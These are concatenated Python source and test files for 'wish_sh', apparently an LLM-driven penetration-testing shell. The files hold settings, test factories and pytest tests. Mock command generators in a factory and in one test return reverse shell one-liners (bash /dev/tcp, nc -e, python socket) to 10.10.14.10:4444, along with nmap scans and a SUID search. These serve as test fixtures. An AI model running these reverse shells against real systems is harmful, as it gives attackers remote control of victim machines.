    # OpenAI API settings
    OPENAI_API_KEY: str = Field(default="sk-test-key" if "PYTEST_CURRENT_TEST" in os.environ else ...)
    OPENAI_MODEL: str = Field("gpt-4o")

    model_config = ConfigDict(
        env_file=".env",
        env_file_encoding="utf-8",
        case_sensitive=False,
        extra="allow",  # Allow additional fields
    )



from pathlib import Path

from wish_models import Settings


class WishPaths:
    def __init__(self, settings: Settings):
        self.settings = settings
        self.history_path = Path(settings.WISH_HOME) / "history.jsonl"

    def ensure_directories(self):
        """Ensure all required directories exist."""
        wish_home = Path(self.settings.WISH_HOME)
        wish_home.mkdir(parents=True, exist_ok=True)

        # Ensure history file exists
        if not self.history_path.exists():
            with open(self.history_path, "w") as _f:
                pass

    def get_wish_dir(self, wish_id: str) -> Path:
        """Get the directory for a specific wish."""
        return Path(self.settings.WISH_HOME) / "w" / wish_id

    def create_command_log_dirs(self, wish_id: str) -> Path:
        """Create log directories for commands of a wish."""
        cmd_log_dir = self.get_wish_dir(wish_id) / "c" / "log"
        cmd_log_dir.mkdir(parents=True, exist_ok=True)
        return cmd_log_dir



"""Factory for WishManager."""

from pathlib import Path
from unittest.mock import MagicMock, mock_open, patch

import factory
from wish_command_execution import CommandExecutor, CommandStatusTracker
from wish_command_execution.backend import BashBackend
from wish_models import CommandState, UtcDatetime

from wish_sh.test_factories.settings_factory import SettingsFactory
from wish_sh.wish_manager import WishManager


class WishManagerFactory(factory.Factory):
    """Factory for WishManager."""

    class Meta:
        model = WishManager

    # SettingsFactoryを使用
    settings = factory.SubFactory(SettingsFactory)

    @classmethod
    def create(cls, **kwargs):
        """Create a WishManager instance with mocked file operations."""
        # Mock all file system operations
        with patch.object(Path, "mkdir"), \
             patch.object(Path, "exists", return_value=True), \
             patch("builtins.open", new_callable=mock_open), \
             patch("wish_sh.wish_paths.WishPaths.ensure_directories"):

            manager = super().create(**kwargs)

            # Initialize backend for testing
            backend = BashBackend()
            manager.executor = CommandExecutor(backend=backend, log_dir_creator=manager.create_command_log_dirs)
            manager.tracker = CommandStatusTracker(manager.executor, wish_saver=manager.save_wish)

            # Mock file system related methods
            manager.paths.create_command_log_dirs = MagicMock(return_value=Path("/mock/path/to/logs"))

            # Mock generate_commands to return test-specific commands
            def mock_generate_commands(wish_text):
                # For tests, return specific commands based on the wish text
                if "scan" in wish_text.lower() and "port" in wish_text.lower():
                    return [
                        "sudo nmap -p- -oA tcp 10.10.10.40",
                        "sudo nmap -n -v -sU -F -T4 --reason --open -T4 -oA udp-fast 10.10.10.40",
                    ]
                elif "find" in wish_text.lower() and "suid" in wish_text.lower():
                    return ["find / -perm -u=s -type f 2>/dev/null"]
                elif "reverse shell" in wish_text.lower() or "revshell" in wish_text.lower():
                    return [
                        "bash -c 'bash -i >& /dev/tcp/10.10.14.10/4444 0>&1'",
                        "nc -e /bin/bash 10.10.14.10 4444",
                        "python3 -c 'import socket,subprocess,os;"
                        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                        's.connect(("10.10.14.10",4444));'
                        "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
                        'subprocess.call(["/bin/sh","-i"]);\'',
                    ]
                else:
                    # Default responses
                    return [
                        f"echo 'Executing wish: {wish_text}'",
                        f"echo 'Processing {wish_text}' && ls -la",
                        "sleep 5"
                    ]

            # Replace the generate_commands method with our mock
            manager.generate_commands = mock_generate_commands

            return manager

    @classmethod
    def create_with_mock_execute(cls, **kwargs):
        """Create a WishManager with mocked execute_command that actually executes commands."""
        manager = cls.create(**kwargs)

        # Make execute_command actually execute the command
        def execute_command_side_effect(wish, command, cmd_num):
            import subprocess
            from pathlib import Path

            # Create a simple log files structure
            log_files = MagicMock()
            log_files.stdout = Path(f"/tmp/stdout_{cmd_num}.log")
            log_files.stderr = Path(f"/tmp/stderr_{cmd_num}.log")

            # Create a command result
            result = MagicMock()
            result.command = command
            result.state = CommandState.DOING
            result.num = cmd_num
            result.log_files = log_files
            result.exit_code = None
            result.finished_at = None

            # Add the result to the wish
            wish.command_results.append(result)

            # Start the process
            process = subprocess.Popen(command, shell=True)

            # Store in running commands dict
            manager.executor.backend.running_commands[cmd_num] = (process, result, wish)

            return result

        manager.execute_command = MagicMock(side_effect=execute_command_side_effect)

        # Make check_running_commands actually check the commands
        def check_running_commands_side_effect():
            for cmd_num, (process, result, _wish) in list(manager.executor.backend.running_commands.items()):
                if process.poll() is not None:  # Process has finished
                    # Update the result
                    result.state = CommandState.SUCCESS if process.returncode == 0 else CommandState.OTHERS
                    result.exit_code = process.returncode
                    result.finished_at = UtcDatetime.now()

                    # Remove from running commands
                    del manager.executor.backend.running_commands[cmd_num]

        manager.check_running_commands = MagicMock(side_effect=check_running_commands_side_effect)

        return manager

    @classmethod
    def create_with_simple_mocks(cls, **kwargs):
        """Create a WishManager with simple mocked methods."""
        from unittest.mock import MagicMock

        manager = cls.create(**kwargs)

        # Mock methods
        manager.execute_command = MagicMock()
        manager.check_running_commands = MagicMock()
        manager.save_wish = MagicMock()

        # Mock generate_commands as an async method
        mock_commands = ["echo 'Test command 1'", "echo 'Test command 2'"]
        mock_result = (mock_commands, None)

        async def mock_generate_commands(wish_text):
            return mock_result

        manager.generate_commands = mock_generate_commands

        manager.cancel_command = MagicMock(return_value="Command 1 cancelled.")

        # Mock command execution components
        manager.executor = MagicMock()
        manager.executor.execute_commands = MagicMock()
        manager.executor.execute_command = MagicMock()
        manager.executor.check_running_commands = MagicMock()
        manager.executor.cancel_command = MagicMock(return_value="Command 1 cancelled.")

        manager.tracker = MagicMock()
        manager.tracker.check_status = MagicMock()
        manager.tracker.is_all_completed = MagicMock(return_value=(False, False))
        manager.tracker.update_wish_state = MagicMock()
        manager.tracker.get_completion_message = MagicMock(return_value="All commands completed.")

        return manager



"""Tests for UIUpdater."""

from unittest.mock import MagicMock

import pytest
from wish_models import CommandState
from wish_models.test_factories import WishDoingFactory

from wish_sh.tui.widgets import UIUpdater


class TestUIUpdater:
    """Tests for UIUpdater."""

    @pytest.fixture
    def screen(self):
        """Create a mock screen."""
        screen = MagicMock()

        # Mock the query_one method to return a mock widget
        status_widget = MagicMock()
        execution_text = MagicMock()

        def query_one_side_effect(selector):
            if selector == "#execution-text":
                return execution_text
            else:
                return status_widget

        screen.query_one.side_effect = query_one_side_effect

        return screen, status_widget, execution_text

    @pytest.fixture
    def wish(self):
        """Create a test wish."""
        wish = WishDoingFactory.create()
        wish.command_results = []  # Clear any existing command results
        return wish

    @pytest.fixture
    def ui_updater(self, screen):
        """Create a UIUpdater instance."""
        screen_obj, _, _ = screen
        return UIUpdater(screen_obj)

    def test_update_command_status(self, ui_updater, screen, wish):
        """Test update_command_status method.

        This test verifies that the update_command_status method correctly
        updates the UI with command statuses.
        """
        screen_obj, status_widget, _ = screen

        # Add command results to the wish
        for i in range(3):
            result = MagicMock()
            result.state = CommandState.SUCCESS
            result.exit_code = 0
            result.log_summary = f"Test summary {i + 1}"
            result.num = i + 1
            wish.command_results.append(result)

        # Update command status
        ui_updater.update_command_status(wish)

        # Verify that query_one was called for each command
        assert screen_obj.query_one.call_count == 3

        # Verify that update was called on the widget
        assert status_widget.update.call_count == 3

        # Verify that the status text contains the expected information
        for i in range(3):
            call_args = status_widget.update.call_args_list[i][0][0]
            assert f"Status: {CommandState.SUCCESS.value}" in call_args
            assert "exit code: 0" in call_args
            assert f"Summary: Test summary {i + 1}" in call_args

    def test_update_command_status_with_exit_code(self, ui_updater, screen, wish):
        """Test update_command_status method with exit code.

        This test verifies that the update_command_status method correctly
        includes the exit code in the status text.
        """
        screen_obj, status_widget, _ = screen

        # Add a command result with a non-zero exit code
        result = MagicMock()
        result.state = CommandState.OTHERS
        result.exit_code = 1
        result.log_summary = "Error occurred"
        result.num = 1
        wish.command_results.append(result)

        # Update command status
        ui_updater.update_command_status(wish)

        # Verify that query_one was called
        screen_obj.query_one.assert_called_once_with("#command-status-1")

        # Verify that update was called on the widget
        status_widget.update.assert_called_once()

        # Verify that the status text contains the expected information
        call_args = status_widget.update.call_args[0][0]
        assert f"Status: {CommandState.OTHERS.value}" in call_args
        assert "exit code: 1" in call_args
        assert "Summary: Error occurred" in call_args

    def test_update_command_status_without_log_summary(self, ui_updater, screen, wish):
        """Test update_command_status method without log summary.

        This test verifies that the update_command_status method correctly
        handles command results without a log summary.
        """
        screen_obj, status_widget, _ = screen

        # Add a command result without a log summary
        result = MagicMock()
        result.state = CommandState.SUCCESS
        result.exit_code = 0
        result.log_summary = None
        result.num = 1
        wish.command_results.append(result)

        # Update command status
        ui_updater.update_command_status(wish)

        # Verify that query_one was called
        screen_obj.query_one.assert_called_once_with("#command-status-1")

        # Verify that update was called on the widget
        status_widget.update.assert_called_once()

        # Verify that the status text contains the expected information
        call_args = status_widget.update.call_args[0][0]
        assert f"Status: {CommandState.SUCCESS.value}" in call_args
        assert "exit code: 0" in call_args
        assert "Summary:" not in call_args

    def test_show_completion_message(self, ui_updater, screen):
        """Test show_completion_message method.

        This test verifies that the show_completion_message method correctly
        updates the execution text widget with the completion message.
        """
        _, _, execution_text = screen

        # Show completion message
        message = "All commands completed."
        ui_updater.show_completion_message(message)

        # Verify that update was called on the widget
        execution_text.update.assert_called_once_with(message)



import json
from unittest.mock import MagicMock, mock_open, patch

from wish_models import WishState
from wish_models.test_factories import WishDoingFactory, WishDoneFactory

from wish_sh.test_factories.settings_factory import SettingsFactory
from wish_sh.wish_manager import WishManager
from wish_sh.wish_paths import WishPaths


class TestWishManager:
    def test_initialization(self):
        """Test that WishManager initializes with the correct attributes."""
        settings = SettingsFactory.create()

        with patch.object(WishPaths, "ensure_directories") as mock_ensure_dirs:
            manager = WishManager(settings)

            assert manager.settings == settings
            assert isinstance(manager.paths, WishPaths)
            assert manager.current_wish is None
            assert hasattr(manager, 'executor')
            assert hasattr(manager, 'tracker')
            mock_ensure_dirs.assert_called_once()

    @patch("builtins.open", new_callable=mock_open)
    def test_save_wish(self, mock_file):
        """Test that save_wish writes the wish to the history file."""
        settings = SettingsFactory.create()
        manager = WishManager(settings)
        wish = WishDoneFactory.create()

        manager.save_wish(wish)

        mock_file.assert_called_with(manager.paths.history_path, "a")
        mock_file().write.assert_called_once()
        # Check that the written string is valid JSON and contains the wish data
        written_data = mock_file().write.call_args[0][0].strip()
        wish_dict = json.loads(written_data)
        assert wish_dict["id"] == wish.id
        assert wish_dict["wish"] == wish.wish

    @patch("builtins.open", new_callable=mock_open)
    def test_load_wishes_empty_file(self, mock_file):
        """Test that load_wishes returns an empty list when the history file is empty."""
        mock_file.return_value.__enter__.return_value.readlines.return_value = []

        settings = SettingsFactory.create()
        manager = WishManager(settings)

        wishes = manager.load_wishes()

        assert wishes == []

    @patch("builtins.open", new_callable=mock_open)
    def test_load_wishes_with_data(self, mock_file):
        """Test that load_wishes returns the expected wishes when the history file has data."""
        wish1 = {
            "id": "id1",
            "wish": "Wish 1",
            "state": WishState.DONE,
            "created_at": "2023-01-01T00:00:00",
            "finished_at": "2023-01-01T01:00:00",
        }
        wish2 = {
            "id": "id2",
            "wish": "Wish 2",
            "state": WishState.DOING,
            "created_at": "2023-01-02T00:00:00",
            "finished_at": None,
        }
        mock_file.return_value.__enter__.return_value.readlines.return_value = [
            json.dumps(wish1) + "\n",
            json.dumps(wish2) + "\n",
        ]

        settings = SettingsFactory.create()
        manager = WishManager(settings)

        wishes = manager.load_wishes()

        assert len(wishes) == 2
        assert wishes[0].id == "id2"  # Most recent first
        assert wishes[0].wish == "Wish 2"
        assert wishes[0].state == WishState.DOING
        assert wishes[1].id == "id1"
        assert wishes[1].wish == "Wish 1"
        assert wishes[1].state == WishState.DONE

    def test_generate_commands(self):
        """Test that generate_commands returns the expected commands based on the wish text."""
        settings = SettingsFactory.create()
        manager = WishManager(settings)

        # Mock the generate_commands method
        def mock_generate_commands(wish_text):
            wish_text = wish_text.lower()
            if "scan port" in wish_text:
                return [
                    "sudo nmap -p- -oA tcp 10.10.10.40",
                    "sudo nmap -n -v -sU -F -T4 --reason --open -T4 -oA udp-fast 10.10.10.40"
                ]
            elif "find suid" in wish_text:
                return ["find / -perm -u=s -type f 2>/dev/null"]
            elif "reverse shell" in wish_text:
                return [
                    "bash -c 'bash -i >& /dev/tcp/10.10.14.10/4444 0>&1'",
                    "nc -e /bin/bash 10.10.14.10 4444",
                    "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                    "s.connect((\"10.10.14.10\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
                    "os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'"
                ]
            else:
                return [
                    f"echo 'Executing wish: {wish_text}'",
                    f"echo 'Processing {wish_text}' && ls -la",
                    "sleep 5"
                ]

        # Replace the generate_commands method with our mock
        manager.generate_commands = mock_generate_commands

        # Test with "scan port" in the wish text
        commands = manager.generate_commands("scan port 80")
        assert len(commands) == 2
        assert "nmap" in commands[0]

        # Test with "find suid" in the wish text
        commands = manager.generate_commands("find suid files")
        assert len(commands) == 1
        assert "find / -perm -u=s" in commands[0]

        # Test with "reverse shell" in the wish text
        commands = manager.generate_commands("create a reverse shell")
        assert len(commands) == 3
        assert any("bash -i" in cmd for cmd in commands)

        # Test with other wish text
        commands = manager.generate_commands("some other wish")
        assert len(commands) == 3
        assert any("echo" in cmd for cmd in commands)

    def test_execute_command(self):
        """Test that execute_command delegates to the executor."""
        settings = SettingsFactory.create()
        manager = WishManager(settings)

        # Mock the executor
        manager.executor = MagicMock()

        wish = WishDoingFactory.create()
        command = wish.command_results[0].command
        cmd_num = 1

        # Execute the command
        manager.execute_command(wish, command, cmd_num)

        # Verify that executor.execute_command was called with the correct arguments
        manager.executor.execute_command.assert_called_once_with(wish, command, cmd_num)

    def test_check_running_commands(self):
        """Test that check_running_commands delegates to the executor."""
        settings = SettingsFactory.create()
        manager = WishManager(settings)

        # Mock the executor
        manager.executor = MagicMock()

        # Check running commands
        manager.check_running_commands()

        # Verify that executor.check_running_commands was called
        manager.executor.check_running_commands.assert_called_once()

    def test_cancel_command(self):
        """Test that cancel_command delegates to the executor."""
        settings = SettingsFactory.create()
        manager = WishManager(settings)
        wish = WishDoingFactory.create()

        # Mock the executor
        manager.executor = MagicMock()
        manager.executor.cancel_command.return_value = "Command 1 cancelled."

        # Cancel a command
        cmd_index = 1
        response = manager.cancel_command(wish, cmd_index)

        # Verify that executor.cancel_command was called with the correct arguments
        manager.executor.cancel_command.assert_called_once_with(wish, cmd_index)
        assert response == "Command 1 cancelled."

    def test_format_wish_list_item_doing(self):
        """Test that format_wish_list_item formats a wish in DOING state correctly."""
        settings = SettingsFactory.create()
        manager = WishManager(settings)

        wish = WishDoingFactory.create()
        wish.state = WishState.DOING

        formatted = manager.format_wish_list_item(wish, 1)

        assert "[1]" in formatted
        assert wish.wish[:10] in formatted
        assert "doing" in formatted.lower()

    def test_format_wish_list_item_done(self):
        """Test that format_wish_list_item formats a wish in DONE state correctly."""
        settings = SettingsFactory.create()
        manager = WishManager(settings)

        wish = WishDoneFactory.create()

        formatted = manager.format_wish_list_item(wish, 1)

        assert "[1]" in formatted
        assert "done" in formatted.lower()



import asyncio

import pytest

from wish_sh.test_factories import CommandExecutionScreenFactory, WishManagerFactory


class TestCommandExecutionScreenWithSleepCommand:
    """Tests for CommandExecutionScreen with sleep commands."""

    @pytest.fixture
    def screen_setup(self):
        """Create a CommandExecutionScreen instance with sleep commands."""
        wish_manager = WishManagerFactory.create_with_simple_mocks()

        screen, status_widget, execution_text = CommandExecutionScreenFactory.create_with_mocked_ui(
            commands=["sleep 1", "sleep 2"],
            wish_manager=wish_manager
        )
        return screen, status_widget, execution_text

    @pytest.mark.asyncio
    async def test_sleep_command_execution_and_ui_update(self, screen_setup):
        """Test that sleep commands are executed and the UI is updated correctly.

        This test verifies:
        1. Commands are properly executed when the screen is mounted
        2. The UI is updated as commands progress
        3. The execution status is correctly tracked
        4. The completion message is displayed when all commands finish
        """
        screen, status_widget, execution_text = screen_setup
        wish_manager = screen.wish_manager
        executor = wish_manager.executor

        # Call on_mount to start command execution
        screen.on_mount()

        # Check that execute_commands was called with the correct arguments
        executor.execute_commands.assert_called_once_with(screen.wish, screen.commands)

        # Check that asyncio.create_task was called
        asyncio.create_task.assert_called_once()

    @pytest.mark.asyncio
    async def test_sleep_command_with_different_durations(self):
        """Test that sleep commands with different durations are executed and tracked correctly.

        This test verifies:
        1. Multiple commands with different durations are executed properly
        2. Each command's completion is tracked independently
        3. The running_commands dictionary is updated correctly as commands complete
        4. All commands eventually complete and the final status is updated
        """
        # Create a screen with commands of different durations
        wish_manager = WishManagerFactory.create_with_simple_mocks()

        screen, status_widget, execution_text = CommandExecutionScreenFactory.create_with_mocked_ui(
            commands=["sleep 0.5", "sleep 1", "sleep 1.5"],
            wish_manager=wish_manager
        )

        executor = wish_manager.executor

        # Call on_mount to start command execution
        screen.on_mount()

        # Check that execute_commands was called with the correct arguments
        executor.execute_commands.assert_called_once_with(screen.wish, screen.commands)

        # Check that asyncio.create_task was called
        asyncio.create_task.assert_called_once()



"""Factory for CommandSuggestion."""

from unittest.mock import MagicMock, patch

import factory
from wish_models.test_factories import WishDoingFactory

from wish_sh.test_factories.wish_manager_factory import WishManagerFactory
from wish_sh.wish_tui import CommandSuggestion


class CommandSuggestionFactory(factory.Factory):
    """Factory for CommandSuggestion."""

    class Meta:
        model = CommandSuggestion

    wish = factory.SubFactory(WishDoingFactory)
    commands = factory.List([
        "echo 'Test command 1'",
        "echo 'Test command 2'"
    ])

    @classmethod
    def create(cls, **kwargs):
        """Create a CommandSuggestion instance."""
        screen = super().create(**kwargs)
        return screen

    @classmethod
    def create_with_mocked_app(cls, **kwargs):
        """Create a CommandSuggestion with mocked app."""
        screen = cls.create(**kwargs)

        # Mock the app property
        app_mock = MagicMock()

        # Add wish_manager to the app
        app_mock.wish_manager = WishManagerFactory.create_with_simple_mocks()

        # Mock the push_screen method
        app_mock.push_screen = MagicMock()

        # Patch the app property
        with patch.object(CommandSuggestion, 'app', new_callable=MagicMock) as mock_app:
            mock_app.return_value = app_mock
            screen.app = app_mock

        return screen, app_mock



"""Factory for WishInput."""

from unittest.mock import MagicMock, patch

import factory
from textual.widgets import Input

from wish_sh.test_factories.wish_manager_factory import WishManagerFactory
from wish_sh.wish_tui import WishInput


class WishInputFactory(factory.Factory):
    """Factory for WishInput."""

    class Meta:
        model = WishInput

    @classmethod
    def create(cls, **kwargs):
        """Create a WishInput instance."""
        screen = super().create(**kwargs)
        return screen

    @classmethod
    def create_with_mocked_app(cls, **kwargs):
        """Create a WishInput with mocked app."""
        screen = cls.create(**kwargs)

        # Mock the app property
        app_mock = MagicMock()

        # Add wish_manager to the app
        app_mock.wish_manager = WishManagerFactory.create_with_simple_mocks()

        # Mock the push_screen method
        app_mock.push_screen = MagicMock()

        # Patch the app property
        with patch.object(WishInput, 'app', new_callable=MagicMock) as mock_app:
            mock_app.return_value = app_mock
            screen.app = app_mock

        return screen, app_mock

    @classmethod
    def create_with_mock_event(cls, wish_text="Test wish", **kwargs):
        """Create a WishInput with a mock Input.Submitted event."""
        screen, app_mock = cls.create_with_mocked_app(**kwargs)

        # Create a mock Input.Submitted event
        mock_event = MagicMock(spec=Input.Submitted)
        mock_event.value = wish_text

        return screen, app_mock, mock_event



"""Factory for Settings."""


import factory

from wish_sh.settings import Settings


class SettingsFactory(factory.Factory):
    """Factory for Settings."""

    class Meta:
        model = Settings

    # テスト用のデフォルト値
    OPENAI_API_KEY = "sk-dummy-key-for-testing"
    OPENAI_MODEL = "gpt-4o-mini"
    WISH_HOME = "/tmp/wish-test-home"

